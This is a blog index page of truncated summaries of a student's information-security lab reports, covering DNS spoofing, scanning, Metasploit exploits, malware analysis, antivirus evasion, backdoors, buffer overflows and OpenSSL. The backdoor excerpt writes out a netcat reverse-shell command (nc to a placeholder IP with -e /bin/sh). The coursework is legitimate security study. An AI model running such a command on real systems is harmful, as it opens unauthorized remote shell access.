摘要:
20155236范晨歌 Exp7 网络欺诈技术防范 虚拟机经常崩= =,所以基本上做一个实验换一个。。。 遇到了一个简单的小问题老师帮忙解决了:虚拟机没联网。。。 一、基础问题回答 1. 通常在什么场景下容易受到DNS spoof攻击? 乱连没有密码的wifi,因为这样就会和连入局域网和该局域网中的 阅读全文
摘要:
20155236范晨歌_exp6信息搜集与漏洞扫描 目录 "实践目标" "信息搜集" "漏洞扫描" "总结" 实践目标 (1)各种搜索技巧的应用 (2)DNS IP注册信息的查询 (3)基本的扫描技术:主机发现、端口扫描、OS及服务版本探测、具体服务的查点 (4)漏洞扫描:会扫,会看报告,会查漏洞说 阅读全文
摘要:
20155236范晨歌_MSF基础应用 20155236范晨歌_MSF基础应用 目录 "概述" "MS08 067漏洞攻击" "MS11 050漏洞攻击" "MS10 087漏洞攻击" "辅助模块" 概述 MSF的六种模块 Exploit模块 是利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,以 阅读全文
摘要:
20155236范晨歌 恶意代码分析 恶意代码 恶意代码是指故意编制或设置的、对网络或系统会产生威胁或潜在威胁的计算机代码。最常见的恶意代码有计算机病毒(简称病毒)、特洛伊木马(简称木马)、计算机蠕虫(简称蠕虫)、后门、逻辑炸弹等。 特征: 恶意的目的,获取靶机权限、用户隐私等 本身是计算机程序,可 阅读全文
摘要:
20155236范晨歌_免杀原理与实践 免杀 概述 免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti AntiVirus(简写Virus AV),逐字翻译为“反 反病毒”,翻译为“反杀毒技术”。 被谁杀?当然是被杀毒软件(引擎)杀。所以,要做好免杀技 阅读全文
摘要:
实验二 后门原理与实践 1.Windows获得Linux Shell 在windows下,打开CMD,使用ipconfig指令查看本机IP 监听本机的5236端口 在kali端,使用nc指令的 e选项,nc XXX.XXX.XXX.XXX(主机ip) 5236(所设置的端口) e /bin/sh反向 阅读全文
摘要:
出现的问题及解决: 在下载execstack时,出现了下列签名无效的错误! 解决方案:发现是密钥过期了,将新的密钥填入apt keyring 输入命令: 再执行update发现问题解决。 实验一 逆向及Bof基础 1.掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码 NOP汇编指令的 阅读全文
摘要:
20155236 《信息安全系统设计基础》课程总结 每周作业链接汇总 "20155236 《信息安全系统设计基础》第1周学习总结" 简要内容:GCC编译器,库的链接 二维码: "20155236 《信息安全系统设计基础》第2周实践博客" 简要内容:vim学习,gcc、gdb的使用 二维码: "201 阅读全文
摘要:
20155236 《信息安全系统设计基础》第14周学习总结 程序的机器级表示 历史观点 Intel处理器系列:俗称x86,开始时是第一代单芯片、16位微处理器之一。 DOS时代的平坦模式,不区分用户空间和内核空间,很不安全; 8086的分段模式; IA32的带保护模式的平坦模式 每个后继处理器的设计 阅读全文
摘要:
2017 2018 1 《信息安全系统设计基础》实验五 通信协议设计 实验任务: 1.安装OpenSSL环境,并编写测试代码验证无误 2.研究OpenSSL算法,测试对称算法中的AES,非对称算法中的RSA,Hash算法中的MD5 3.在Ubuntu中实现对实验二中的“wc服务器”通过混合密码系统进 阅读全文